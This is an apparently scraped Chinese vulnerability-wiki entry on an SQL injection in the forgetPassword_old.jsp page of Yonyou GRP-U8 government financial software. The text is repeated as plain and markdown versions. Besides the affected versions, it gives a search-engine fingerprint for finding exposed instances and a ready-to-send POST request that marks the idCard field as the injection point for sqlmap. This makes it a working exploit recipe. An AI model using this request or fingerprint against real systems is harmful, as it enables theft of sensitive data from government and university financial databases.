fofamini-wiki

登录白背景

源码

用友GRP-U8 forgetPassword_old.jsp 存在sql注入

一、漏洞简介

用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域专业的财务管理软件。用友 GRP-U8 存在SQL注入漏洞，攻击者通过该漏洞可以获取数据库敏感信息。

二、影响版本

用友GRP-U8 行政事业内控管理软件（新政府会计制度专版）
用友GRP-U8 高校内控管理软件（Manager版）

三、资产测绘

hunterapp.name="用友GRP-U8 OA"
特征

四、漏洞复现

访问/u8qx/forgetPassword_old.jsp?action=save出现如下界面表示可能存在漏洞

POST /u8qx/forgetPassword_old.jsp?action=save HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 43
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

idCard=1*&inputDW=1&userName=1

sqlmap

原文: https://www.yuque.com/xiaokp7/ocvun2/mribqb261ig7c321

# 用友GRP-U8 forgetPassword_old.jsp 存在sql注入

# 一、漏洞简介
用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域专业的财务管理软件。用友 GRP-U8 存在SQL注入漏洞，攻击者通过该漏洞可以获取数据库敏感信息。

# 二、影响版本

- 用友GRP-U8 行政事业内控管理软件（新政府会计制度专版）
- 用友GRP-U8 高校内控管理软件（Manager版）

# 三、资产测绘

- hunter`app.name="用友GRP-U8 OA"`
- 特征

![image.png](./img/2EKIHSehpabBev8z/1696132271756-860b06b9-a041-40a7-801c-1d19f68283a6-077749.png)
![image.png](./img/2EKIHSehpabBev8z/1696132517728-7a746455-5255-4276-97e0-2f7c40f6cb39-172160.png)
![image.png](./img/2EKIHSehpabBev8z/1696132546612-e8cecff0-554c-44de-a6f7-497c1618908d-685143.png)

# 四、漏洞复现
访问`/u8qx/forgetPassword_old.jsp?action=save`出现如下界面表示可能存在漏洞
![image.png](./img/2EKIHSehpabBev8z/1698337625985-46e928b3-e6b9-41c3-ad31-c815fdd942ba-251183.png)
```java
POST /u8qx/forgetPassword_old.jsp?action=save HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 43
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

idCard=1*&inputDW=1&userName=1
```
sqlmap
![image.png](./img/2EKIHSehpabBev8z/1698338207388-06fda46b-d3e6-4edc-89f2-cd8d60437ef5-902604.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mribqb261ig7c321>